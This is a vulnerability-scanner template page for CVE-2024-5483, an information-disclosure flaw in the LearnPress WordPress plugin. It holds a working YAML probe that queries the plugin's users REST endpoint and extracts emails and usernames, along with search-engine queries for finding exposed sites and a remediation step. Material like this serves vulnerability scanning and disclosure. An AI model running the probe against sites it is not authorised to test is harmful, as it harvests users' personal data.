LearnPress < 4.2.6.8.1 - Information Disclosure
CVE-2024-5483
Verified
Description
LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by incorrect implementation of get_items_permissions_check function in all versions up to 4.2.6.8, letting unauthenticated attackers extract user emails and basic information.
Severity
Medium
CVSS Score
5.3
Exploit Probability
6%
Affected Product
learnpress
Published Date
February 7, 2026
Template Author
pussycat0x
CVE-2024-5483.yaml
id: CVE-2024-5483

info:
  name: LearnPress < 4.2.6.8.1 - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by incorrect implementation of get_items_permissions_check function in all versions up to 4.2.6.8, letting unauthenticated attackers extract user emails and basic information.
  impact: |
    Unauthenticated attackers can access sensitive user information, including emails, leading to privacy breaches.
  remediation: Update to version 4.2.6.9 or later.
  reference:
    - https://wpscan.com/vulnerability/1f253156-333b-4be6-b727-06237567be1e/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-5483
    epss-score: 0.05516
    epss-percentile: 0.90337
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2024,wordpress,wpscan,wp-plugin,learnpress,vuln,info-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/learnpress/v1/users"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id","email","username","email")'
        condition: and

    extractors:
      - type: regex
        name: user_email
        part: body
        regex:
          - '"(?:email|user_email)"\s*:\s*"([^"@]+@[^"]+)"'
        group: 1
        internal: true

      - type: regex
        name: username
        part: body
        regex:
          - '"(?:username|user_login)"\s*:\s*"([^"]+)"'
        group: 1
        internal: true

      - type: dsl
        dsl:
          - "'Username: ' + username"
          - "'Email: ' + user_email"
# digest: 480a0045304302206e88cecd624401fc78c67696c9b7b0279efa4c96ddad579493a22255f6153eed021f46a23e58d06d63161cd8e9eee387409db6ec50d613d3a1f9c0dd692e256142:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2024-5483
CWE ID:
cwe-200
Remediation Steps
Update to version 4.2.6.9 or later.